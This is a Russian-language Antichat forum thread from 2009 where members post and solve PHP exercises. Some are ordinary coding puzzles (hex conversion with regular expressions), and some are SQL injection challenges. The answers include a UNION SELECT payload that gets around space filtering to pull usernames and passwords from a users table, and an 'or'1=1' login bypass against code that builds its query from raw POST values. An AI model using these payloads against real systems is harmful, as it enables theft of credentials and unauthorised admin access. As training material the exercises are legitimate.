HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.06.2009, 23:53
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию

ну смотря в какой сисиеме 16/32/64 и что short/long не помнб что ставится по умолчанию када пишешь просто int =)
 
Ответить с цитированием

  #2  
Старый 21.06.2009, 23:54
desTiny
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами: 10139366

Репутация: 1502


По умолчанию

int по дефолту 32-битный (в 32-битной системе и тп все меня поняли). короче, нет там переполнений)
__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
 
Ответить с цитированием

  #3  
Старый 21.06.2009, 23:59
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию

не удержался .. скомплил .. ппц =)

хмм .. написал то же самое ручками сё норм ..
еси скопировать то выходит байда оО wtf?


бля сцук)) это не 1 а L ! =)

Последний раз редактировалось Doom123; 22.06.2009 в 00:23..
 
Ответить с цитированием

  #4  
Старый 22.06.2009, 00:52
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию

Пожалуйста, не пишите сюда задания на с и с++, для этого есть специальный разел. Завтра еще заданий добавлю. И обновлю фак в начале. Спасибо всем кто принимает участие! Пхп-взлом -новая тематика заданий)
 
Ответить с цитированием

  #5  
Старый 22.06.2009, 02:16
Extremal
Познающий
Регистрация: 21.06.2006
Сообщений: 74
С нами: 10467109

Репутация: 222
По умолчанию

Цитата:
Задание 010
Провести sql injection
PHP код:
<?php
$name 
str_replace('/**/','','str_replace(' ','',$_GET['name']));
$query = mysql_query("select * from users where name='
$name"); ?>
Код:
http://site.com/index.php?name=union%09select%091,2,CONCAT_WS(':',name,passwd),4,5,6%09from%09users/*

Последний раз редактировалось Extremal; 22.06.2009 в 02:18..
 
Ответить с цитированием

  #6  
Старый 22.06.2009, 03:27
SleepShadowWeb
Новичок
Регистрация: 02.02.2006
Сообщений: 28
С нами: 10667697

Репутация: 54
По умолчанию

в 6 'password'=0
в 9 точек добавить штук 250
в 11
PHP код:
function zamena($s
{
    return 
"0x".strtoupper(dechex($s[1]));
}


$str='  
383 текст с числами 5838  
635 еще текст 001 462  
432текст564  
'


$str preg_replace_callback("/(\d{4})/U""zamena"$str);
$str preg_replace_callback("/(\d{3})/U""zamena"$str);
echo 
$str

Последний раз редактировалось SleepShadowWeb; 22.06.2009 в 04:20..
 
Ответить с цитированием

  #7  
Старый 22.06.2009, 11:27
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию

SleepShadowWeb, 9 задание не правильно сделал, остальные правильно! Молодец.

Добавил еще 3 задания.

Последний раз редактировалось Krist_ALL; 22.06.2009 в 12:27..
 
Ответить с цитированием

  #8  
Старый 22.06.2009, 12:09
d_x
Постоянный
Регистрация: 25.03.2008
Сообщений: 670
С нами: 9541766

Репутация: 2407


По умолчанию

SleepShadowWeb, правильно 011 сделал, хотя можно было немного попроще:
PHP код:
$str='
383 текст с числами 5838
635 еще текст 001 462
432текст564
'
;

$str=preg_replace_callback("/(\d+)/s","replace_hex",$str);

function 
replace_hex($m)
{
  return 
'0x'.strtoupper(dechex($m[1]));
}

print 
$str
 
Ответить с цитированием

  #9  
Старый 22.06.2009, 13:22
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию

Цитата:
Сообщение от d_x  
SleepShadowWeb, правильно 011 сделал, хотя можно было немного попроще:
PHP код:
$str='
383 текст с числами 5838
635 еще текст 001 462
432текст564
'
;

$str=preg_replace_callback("/(\d+)/s","replace_hex",$str);

function 
replace_hex($m)
{
  return 
'0x'.strtoupper(dechex($m[1]));
}

print 
$str
в регулярке модификатор s зачем? помоему и без него реплейсу живёться не дурно..
strtoupper тут зачем ? поднимаем хекс товарищи!
в колбеках с небольшой ф-ией удобно будет заюзать create_function(); вместо создания отдельной ..

Последний раз редактировалось 159932; 22.06.2009 в 13:27..
 
Ответить с цитированием

  #10  
Старый 22.06.2009, 12:32
Extremal
Познающий
Регистрация: 21.06.2006
Сообщений: 74
С нами: 10467109

Репутация: 222
По умолчанию

Задание 013
Войти в панель администрирования, используя sql injection . В БД не лезть. Обмануть проверку просто.
PHP код:
PHP код:
<?php // Login.php
....
$query "select * from admin where pass = '$_POST['pass']' and login = '$_POST['login']'";
?>
Код:
login = 'or'1=1'
pass = 'or'1=1'
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[php] On-Line Фейк mail.ru m0Hze Уязвимости Mail-сервис 45 21.08.2013 09:10
SQL-Inj Finder by mr.The [Special for antichat] [PHP] mr.The PHP 24 07.08.2009 01:30
Задания ~Fenix~ Болталка 11 13.05.2006 11:03



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.